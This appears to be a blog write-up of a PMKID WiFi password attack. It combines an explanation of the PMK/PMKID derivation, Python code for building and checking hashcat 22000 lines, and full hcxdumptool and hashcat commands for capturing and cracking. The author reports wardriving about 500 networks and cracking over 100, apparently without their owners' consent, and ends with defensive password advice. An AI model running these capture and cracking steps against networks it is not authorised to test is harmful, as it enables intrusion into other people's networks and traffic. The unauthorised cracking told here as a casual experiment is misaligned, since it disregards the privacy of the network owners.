PMKID Attack

Saw an article by Cyberark saying, “in a couple of hours and with approximately $50, your neighbor or a malicious actor can compromise your privacy and much more if you don’t have a strong password”. I wanted to know if I only had to spend ~$50 to crack WiFi.

This attack was discovered accidentally by Atom in 2018, “while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follows:

  • No more regular users required — because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) — final data will appear as regular hex encoded string”.

Flow of Calculating PMKID hash and PMK

For the PMKID attack to work we need to generate a PMK derived from the SSID (the network name) and the passphrase; then we generate a PMKID derived from that PMK, the AP MAC address, and the client MAC address. So let us see where we can find those:

PMK Calculation
  • PMK (Pairwise Master Key): the value we are searching for, generated as described above. In WPA2-Personal the PMK is the PSK.
  • Passphrase: the WiFi password
  • SSID: the name of the network. It is freely available in the router's beacons
  • 4096: the number of PBKDF2 iterations (for comparison, OWASP recommends 720,000 iterations for PBKDF2-HMAC-SHA1)
  • PBKDF2: Password-Based Key Derivation Function 2, which makes it harder to guess a password by brute force
PMKID Calculation
  • PMKID: Pairwise Master Key Identifier
  • “PMK Name”: static string, the same for all PMKIDs.
  • MAC_AP: the access point's MAC address. It can be found in any frame sent by the router
  • MAC_STA: the client's MAC address. It can be found in any frame sent by the client's computer, and also in the output of ifconfig or ip a.
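The two derivations described in the lists above, as an added Python example that is not part of the original post: the PMK from passphrase and SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes), then the PMKID as the first 16 bytes of HMAC-SHA1 over "PMK Name" || MAC_AP || MAC_STA. The MAC addresses are constructed placeholders; the passphrase/SSID pair "password"/"IEEE" is the published IEEE 802.11 Annex test vector, so the PMK value can be checked; the line layout used by the two helpers (WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***) is the hashcat mode 22000 format for PMKID entries. The helper names are my own.

```python
import hashlib
import hmac

# WPA2-Personal key derivation parameters (IEEE 802.11i): PBKDF2-HMAC-SHA1,
# 4096 iterations, 256-bit output. The iteration count is fixed by the standard.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32
PMK_NAME = b"PMK Name"  # static label prepended for every PMKID


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096, 256 bits).
    In WPA2-Personal the PMK is the PSK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, PMK_LEN)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): first 16 bytes."""
    if len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("MAC addresses must be 6 bytes")
    return hmac.new(pmk, PMK_NAME + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def build_hc22000_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """Format a PMKID as a hashcat mode 22000 line:
    WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***
    Type 01 = PMKID. The last three fields (ANONCE, EAPOL, message pair) are
    only used by type 02 (EAPOL) entries and stay empty here."""
    return "*".join(["WPA", "01", pmkid.hex(), mac_ap.hex(), mac_sta.hex(),
                     ssid.encode().hex(), "", "", ""])


def parse_hc22000_line(line: str) -> dict:
    """Inverse of build_hc22000_line; accepts only PMKID (type 01) lines."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID hc22000 line")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "mac_ap": bytes.fromhex(fields[3]),
        "mac_sta": bytes.fromhex(fields[4]),
        "ssid": bytes.fromhex(fields[5]).decode(),
    }


def passphrase_reproduces_pmkid(line: str, passphrase: str) -> bool:
    """Recompute the PMKID from a candidate passphrase and compare it with the
    captured one. One PBKDF2 plus one HMAC is the unit of work a cracker repeats
    per guess, so the passphrase's entropy is what scales the attacker's cost."""
    h = parse_hc22000_line(line)
    pmk = derive_pmk(passphrase, h["ssid"])
    candidate = derive_pmkid(pmk, h["mac_ap"], h["mac_sta"])
    return hmac.compare_digest(candidate, h["pmkid"])


# Constructed sample: locally administered (02:...) MAC addresses, plus the
# IEEE 802.11 Annex test vector "password"/"IEEE" for the PMK.
SAMPLE_MAC_AP = bytes.fromhex("02aabbccdd01")
SAMPLE_MAC_STA = bytes.fromhex("02aabbccdd02")
SAMPLE_SSID = "IEEE"
SAMPLE_PASSPHRASE = "password"


def sample_line() -> str:
    """A complete hc22000 PMKID line for the constructed sample network."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    pmkid = derive_pmkid(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA)
    return build_hc22000_line(pmkid, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_SSID)


if __name__ == "__main__":
    line = sample_line()
    print(line)
    print("PMK:", derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID).hex())
    print("correct passphrase:", passphrase_reproduces_pmkid(line, SAMPLE_PASSPHRASE))
    print("wrong passphrase:  ", passphrase_reproduces_pmkid(line, "Summer$021"))
```

Note that nothing in the PMKID depends on the client beyond its MAC address, which is why the attack needs no connected user: everything except the passphrase is either broadcast by the AP or chosen by whoever sends the association request.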

Now we know how a PMKID is being generated, and we can continue to the sniffing and cracking phases. Before sniffing we need to set up our environment.

Hardware

  • Macbook Air 2011 $85
  • ALFA AWUS036ACH $65

Software

  • Kali Linux
  • Hashcat
  • Hcxdumptool
  • Hcxpcapngtool

The Alfa did not work out of the box; I had to install drivers.

$ sudo apt update
$ sudo apt upgrade -y
$ sudo apt dist-upgrade -y
$ sudo reboot now
$ sudo apt update
$ sudo apt install realtek-rtl88xxau-dkms
$ sudo apt install dkms
$ git clone https://github.com/aircrack-ng/rtl8812au
$ cd rtl8812au/
$ make
$ sudo make install

Next I installed hcxdumptool and hcxtools.

$ git clone https://github.com/ZerBea/hcxdumptool.git
$ cd hcxdumptool
$ sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
$ make
$ sudo make install
$ git clone https://github.com/ZerBea/hcxtools.git
$ cd hcxtools
$ make
$ sudo make install

Stop all services that are accessing the WLAN device (e.g. NetworkManager and wpa_supplicant.service):

$ sudo systemctl stop wpa_supplicant
$ sudo service NetworkManager stop

Packet Sniffing

$ sudo hcxdumptool -i interface -o dumpfile.pcapng --active_beacon --enable_status=15

When I reached 500 SSIDs, I decided to quit; the California weather was too hot to be walking around.

Convert PCAP into hash file

I had to convert the capture to a format Hashcat can read, so I used hcxpcapngtool to convert the pcapng into a hash file.

$ sudo hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
Example of hashfile line

Now we can start cracking passwords. The Mac was not able to run Hashcat in 22000 mode, so I used Hashcat on my PC with a 2080 Ti.

Bruteforce Attack

Here is my Hashcat command that tried all the possible cellphone number combinations for the 408 California area code.

Mask Attack

$ hashcat -m 22000 hash.hc22000 -a 3 408?d?d?d?d?d?d?d
  • ?l = abcdefghijklmnopqrstuvwxyz
  • ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  • ?d = 0123456789
  • ?h = 0123456789abcdef
  • ?H = 0123456789ABCDEF
  • ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  • ?a = ?l?u?d?s
  • ?b = 0x00 - 0xff

If I were to use ?l?l?l?l?l?l?l?l (8 lower-case letters), it would take my hardware 1 year to crack.
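To put numbers on the mask comparison above, here is an added Python example (not from the original post) that parses a hashcat mask against the charset table just listed, computes its keyspace, and converts that into a worst-case time at a guess rate you supply. The guess rate is a parameter, not an assumption about any particular GPU; the function names are my own.

```python
import math

# hashcat built-in charsets exactly as listed above; ?b is the 256 byte values
CHARSETS = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]
CHARSET_SIZES = {name: len(chars) for name, chars in CHARSETS.items()}
CHARSET_SIZES["b"] = 256


def parse_mask(mask: str) -> list:
    """Split a hashcat mask into positions: ('literal', ch) or ('charset', name).
    '??' is hashcat's escape for a literal question mark."""
    positions = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch != "?":
            positions.append(("literal", ch))
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("dangling '?' at end of mask")
        nxt = mask[i + 1]
        if nxt == "?":
            positions.append(("literal", "?"))
        elif nxt in CHARSET_SIZES:
            positions.append(("charset", nxt))
        else:
            raise ValueError(f"unknown charset ?{nxt}")
        i += 2
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask generates: the product of the charset
    sizes. Literal positions (like the fixed 408 prefix) contribute a factor 1."""
    total = 1
    for kind, value in parse_mask(mask):
        if kind == "charset":
            total *= CHARSET_SIZES[value]
    return total


def entropy_bits(mask: str) -> float:
    """Guessing entropy of the pattern in bits, for comparing password policies."""
    return math.log2(keyspace(mask))


def seconds_to_exhaust(mask: str, guesses_per_second: float, networks: int = 1) -> float:
    """Worst-case time to run the whole mask. Each WPA2 network salts PBKDF2
    with its own SSID, so a hash file with several distinct networks multiplies
    the work by the number of networks."""
    return keyspace(mask) * networks / guesses_per_second


if __name__ == "__main__":
    # The constructed rate below is only a placeholder; measure your own with
    # hashcat's benchmark (hashcat -b -m 22000) and pass it in.
    rate = 500_000.0
    for mask in ("408?d?d?d?d?d?d?d", "?l?l?l?l?l?l?l?l", "Summer$?d?d?d", "?a?a?a?a?a?a?a?a?a?a"):
        print(f"{mask:24} keyspace={keyspace(mask):>22,} "
              f"{entropy_bits(mask):5.1f} bits  {seconds_to_exhaust(mask, rate) / 86400:12.1f} days")
```

The comparison is the point: a ten-digit phone number with a known area code is only 10^7 guesses, a fixed word followed by a few digits is even smaller, while ten characters drawn from all four classes is 95^10, which is out of reach at any single-GPU rate.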

Dictionary Attack

Next I did a dictionary attack with rockyou2021.txt. rockyou2021.txt is a compilation of dictionaries, breached words, and probable passwords, released by kys234 on RaidForums.

$ hashcat -m 22000 hash.hc22000 rockyou2021.txt

Conclusion

In total I cracked more than 100 WiFi networks, around 25% of the sample size. Not all routers support roaming features and are, therefore, not vulnerable to the PMKID attack.

The WiFi password is what prevents hackers and others from accessing your home wireless network, stealing your bandwidth and even viewing your traffic. You probably want a password that is easy enough to give to guests who want to use your wireless network, but an easy and weak password can be cracked just as easily by hackers. A couple, but not all, of the things an attacker can then do:

  1. Can capture traffic moving in and out of your system.
  2. MITM
  3. If you don't have all the recent updates and patches, the attacker might be able to find and exploit a vulnerability. This would allow them to take control of your system or plant a keylogger on it.
  4. Anonymously perform some illegal hacking activity from your network, after which the authorities will trace it back to you.

How to prevent it?

  1. Choose a complex password. A strong password should include at least one lower-case character, one upper-case character, one symbol and one digit. It should be at least 10 characters long. It should be easy to remember and hard to anticipate. Bad example: Summer$021
  2. Change the default username and password of your router.
  3. Update your router firmware version.
  4. Disable weak encryption protocols (such as WEP or WPA1).
  5. Disable WPS.

References

  1. https://www.youtube.com/watch?v=hEXwOkyYNL0
  2. https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick
  3. https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
  4. https://hashcat.net/forum/thread-7717.html
  5. https://chris.partridge.tech/2021/rockyou2021.txt-a-short-summary/#download
